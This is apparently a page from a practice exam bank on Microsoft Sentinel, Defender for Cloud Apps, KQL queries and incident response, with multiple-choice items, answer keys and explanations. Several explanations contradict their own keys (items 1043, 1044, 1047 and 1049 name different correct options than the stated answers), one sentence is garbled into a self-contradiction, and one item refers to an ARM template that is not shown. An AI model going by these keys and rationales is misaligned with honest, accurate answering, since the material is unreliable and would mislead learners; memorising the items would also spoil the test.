C.The inner join excludes entries that do not have a corresponding risky sign-in event.
D.The join condition does not include AccountUpn, so it fails to match.
AnswerC

The inner join only retains rows where the AccountUpn and IPAddress appear in both IdentityLogonEvents and AADSignInEventsBeta with the specified risk level.

Why this answer

Option D is correct because the join is an inner join, which only returns rows that have matching AccountUpn and IPAddress in both tables. If high LogonCount entries do not have a corresponding risky sign-in event (RiskLevelDuringSignIn medium or high), they will be excluded. Option A is wrong because the query uses RiskLevelDuringSignIn, not RiskLevelDuringSignIn.

Option B is wrong because the query filters by Application == 'Microsoft Teams', so it only considers Teams logons. Option C is wrong because the join keys are AccountUpn and IPAddress, not AccountUpn alone.

1043
Multi-Selecthard

You are configuring Microsoft Defender for Cloud Apps with Cloud Discovery. You need to ensure that logs from your network proxies are processed correctly. Which THREE steps are required?

Select 3 answers
A.Upload the log files manually or configure automatic log upload using the log collector.
B.Install the Microsoft Defender for Cloud Apps connector in Sentinel.
C.Enable Azure Information Protection for labeling.
D.Ensure proxy logs are in a supported format such as Common Log Format (CLF).
E.Configure the source IP address ranges of your organization in Defender for Cloud Apps settings.
AnswersA, D, E

Logs must be uploaded for analysis.

Why this answer

Options A, B, and E are correct. Logs must be in a supported format, uploaded to Defender for Cloud Apps, and matched with the source IP ranges of your organization. Option C is not required; Option D is not required for Cloud Discovery.

1044
MCQmedium

You are reviewing this ARM template for a Microsoft Sentinel analytics rule. What is the most likely issue with the rule?

A.The rule type is incorrect for this scenario
B.The query syntax is invalid
C.The query references a table that does not exist in Microsoft Sentinel
D.The severity property should be 'Informational'
AnswerC

IdentityInfo is not a standard Sentinel table.

Why this answer

Option A is correct because the query uses 'IdentityInfo' table which is not a standard Sentinel table; it should be 'IdentityLogonEvents' or 'AuditLogs'. Option B is wrong because the syntax is valid. Option C is wrong because severity is valid.

Option D is wrong because the rule type is correct.

1045
MCQmedium

A security analyst detects a suspicious sign-in from an unusual location using Microsoft Entra ID. The user has not enabled MFA. Which action should the analyst take first to investigate and potentially contain the incident?

A.Reset the user's password immediately.
B.Enable Conditional Access to block all sign-ins from that location.
C.Disable the user account.
D.Block legacy authentication for the entire tenant.
AnswerC

Disabling the account immediately prevents any further sign-ins and contains the incident while investigation is ongoing.

Why this answer

Disabling the user account is the immediate containment action to prevent further unauthorized access while investigation proceeds. Resetting password alone doesn't stop current session; blocking legacy auth is a broader action that may break legitimate services; MFA is enabling but not immediate containment.

1046
MCQeasy

An incident is opened in Microsoft Sentinel for multiple sign-in failures from a single IP address targeting a privileged user account. Which action is most effective in automatically responding to this incident?

A.Create a playbook to block the IP address in the firewall.
B.Enable conditional access policy to require MFA for the user.
C.Create a playbook to automatically disable the user account.
D.Report the IP address to Microsoft for threat intelligence.
AnswerA

Blocking the IP stops the attack at the source without affecting the user account.

Why this answer

The most effective automated response is to block the IP address in the firewall via a playbook, as it directly stops the attack source. Disabling the user account is too broad and may affect legitimate access. Enabling MFA does not stop the current attack.

Reporting the IP is not immediate.

1047
MCQmedium

Your organization uses Microsoft Sentinel. A security analyst reports that an incident was created for a sign-in from an unfamiliar location, but after investigation, it was determined to be a false positive. You need to ensure that similar sign-ins do not generate incidents in the future. What should you do?

A.Modify the built-in Microsoft analytics rule to exclude the sign-in location.
B.Close the incident with a classification of False Positive.
C.Create an automation rule that automatically closes similar incidents.
D.Create a custom analytics rule with an alert suppression condition matching the sign-in attributes.
AnswerD

Alert suppression allows you to exclude certain events from triggering alerts.

Why this answer

Option B is correct because creating a custom analytics rule with an alert suppression condition based on the specific location or user attributes will prevent future alerts for similar events. Option A is wrong because closing the incident does not suppress future alerts. Option C is wrong because modifying the built-in rule's query is not recommended and may affect other detections.

Option D is wrong because automation rules handle response actions, not alert suppression.

1048
MCQmedium

A SOC analyst in Microsoft Sentinel is creating a scheduled analytics rule to detect sign-ins from IP addresses known to be associated with a threat actor. The list of threat actor IPs is maintained in a custom Microsoft Sentinel watchlist and is updated daily. The analyst wants the rule to query the SigninLogs table and compare the IP address against this list. What is the most efficient way to reference the list in the KQL query?

A.Use the externaldata operator to read from a blob storage URL.
B.Use the let statement to define a static list inline.
C.Use the _GetWatchlist() function to retrieve the watchlist.
D.Use the datatable operator to define the list directly in the query.
AnswerC

_GetWatchlist() is the built-in function to retrieve watchlist data. It efficiently caches the data and automatically reflects updates without changing the rule query.

Why this answer

Option C is correct because the `_GetWatchlist()` function is the built-in, optimized way to reference a Microsoft Sentinel watchlist within a KQL query. It retrieves the watchlist data directly from the Sentinel workspace, ensuring the query always uses the latest daily-updated list without manual maintenance or external dependencies. This approach is both efficient and aligns with Sentinel's intended design for dynamic threat intelligence.

Exam trap

The trap here is that candidates may confuse `_GetWatchlist()` with other data retrieval methods like `externaldata` or `datatable`, not realizing that watchlists are a first-class Sentinel feature designed for exactly this use case—dynamic, centrally managed threat intelligence that updates automatically without query modification.

How to eliminate wrong answers

Option A is wrong because the `externaldata` operator reads data from an external blob storage URL, which introduces latency, requires managing access keys, and bypasses Sentinel's native watchlist caching and update mechanisms. Option B is wrong because a `let` statement defines a static list inline, which would require manual editing of the query every time the threat actor IP list changes, defeating the purpose of a daily-updated watchlist. Option D is wrong because the `datatable` operator defines a hardcoded list directly in the query, similar to a static `let` statement, and cannot be dynamically updated without modifying the analytics rule itself.

1049
MCQhard

Your organization uses Microsoft Sentinel with User and Entity Behavior Analytics (UEBA) enabled. You notice that the UEBA is not generating any anomalies for a particular user who has been inactive for 30 days. You have verified that the user's data is being ingested into the workspace. What is the most likely reason?

A.UEBA requires a minimum of 14 days of activity to establish a baseline.
B.The user's license does not include UEBA.
C.UEBA only works with Active Directory data, not Microsoft Entra ID.
D.UEBA is not enabled for the workspace.
AnswerA

Without a baseline, UEBA cannot detect anomalies.

Why this answer

UEBA requires a baseline of at least 14 days of activity to establish normal behavior. If the user has been inactive for 30 days, there is no baseline to compare against, so no anomalies are generated. Option D is correct.

Option A is wrong because UEBA can work with any data source if configured. Option B is wrong because UEBA is enabled by default when you enable UEBA. Option C is wrong because the user's data is being ingested, so it's not a licensing issue.

1050
MCQmedium

Your organization uses Microsoft Sentinel and Microsoft Defender for Office 365. You have configured incident creation from Microsoft Defender for Office 365 alerts in Microsoft Sentinel. However, you notice that some alerts are not creating incidents. Which step should you take to troubleshoot this issue?

A.Examine the analytics rule that creates incidents from Microsoft Defender for Office 365 alerts and verify the severity threshold.
B.Check the Microsoft 365 Defender portal to confirm that the alerts are being generated.
C.Review the Microsoft Sentinel workbooks for any visualization errors.
D.Verify that the Microsoft Defender for Office 365 data connector in Microsoft Sentinel is connected and data is ingested.
AnswerA

The analytics rule filters alerts; a severity threshold may be too high.

Why this answer

Option A is correct because the analytics rule that maps Microsoft Defender for Office 365 alerts to incidents in Microsoft Sentinel includes a severity threshold filter. If the rule is configured to only create incidents for alerts with a severity of 'High' or 'Medium', alerts with 'Low' severity or 'Informational' will be silently dropped and not generate incidents. Verifying and adjusting this threshold directly addresses the root cause of missing incidents.

Exam trap

The trap here is that candidates often assume the issue is with data ingestion (Option D) or alert generation (Option B), but the actual cause is a misconfigured severity threshold within the analytics rule that silently filters out lower-severity alerts before they can become incidents.

How to eliminate wrong answers

Option B is wrong because checking the Microsoft 365 Defender portal only confirms that alerts are generated at the source, but it does not troubleshoot why those alerts fail to create incidents in Microsoft Sentinel; the issue is in the ingestion or rule logic, not in alert generation. Option C is wrong because Microsoft Sentinel workbooks are visualization tools that display data already ingested; they do not affect incident creation and cannot diagnose why alerts are not being turned into incidents. Option D is wrong because verifying the data connector status ensures data ingestion from Microsoft Defender for Office 365, but if the connector is connected and data is flowing, the problem lies in the analytics rule's configuration (e.g., severity threshold or rule logic), not in the connector itself.

Page 13

Page 14 of 22

Page 15